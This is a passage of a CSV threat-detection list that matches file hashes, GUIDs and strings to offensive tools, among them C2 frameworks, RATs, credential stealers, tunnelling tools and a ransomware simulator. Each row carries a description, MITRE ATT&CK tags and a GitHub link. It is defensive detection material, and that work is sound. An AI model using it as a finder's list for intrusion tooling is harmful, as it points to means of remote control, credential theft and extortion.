tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b*",".{0,1000}c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf*",".{0,1000}c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*C373A937-312C-4C8D-BD04-BAAF568337E7*",".{0,1000}C373A937\-312C\-4C8D\-BD04\-BAAF568337E7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*C37637FC-3792-4354-8F5B-7E319E4E5A6D*",".{0,1000}C37637FC\-3792\-4354\-8F5B\-7E319E4E5A6D.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1*",".{0,1000}c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd*",".{0,1000}c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6*",".{0,1000}c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f*",".{0,1000}c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73*",".{0,1000}c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9*",".{0,1000}c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de*",".{0,1000}c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8*",".{0,1000}c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec*",".{0,1000}c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f*",".{0,1000}c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f*",".{0,1000}c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1*",".{0,1000}c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e*",".{0,1000}c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98*",".{0,1000}c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5*",".{0,1000}c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40*",".{0,1000}c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*C4RD N4M3: *| NUMB3R:*",".{0,1000}C4RD\sN4M3\:\s.{0,1000}\|\sNUMB3R\:.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41*",".{0,1000}c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*C526B877-6AFF-413C-BC03-1837FB63BC22*",".{0,1000}C526B877\-6AFF\-413C\-BC03\-1837FB63BC22.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb*",".{0,1000}c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d*",".{0,1000}c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527*",".{0,1000}c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2*",".{0,1000}c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac*",".{0,1000}c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98*",".{0,1000}c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c*",".{0,1000}c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54*",".{0,1000}c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454*",".{0,1000}c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2*",".{0,1000}c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a*",".{0,1000}c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c*",".{0,1000}c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a*",".{0,1000}c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d*",".{0,1000}c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16*",".{0,1000}c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95*",".{0,1000}c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c*",".{0,1000}c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20*",".{0,1000}c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f*",".{0,1000}c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 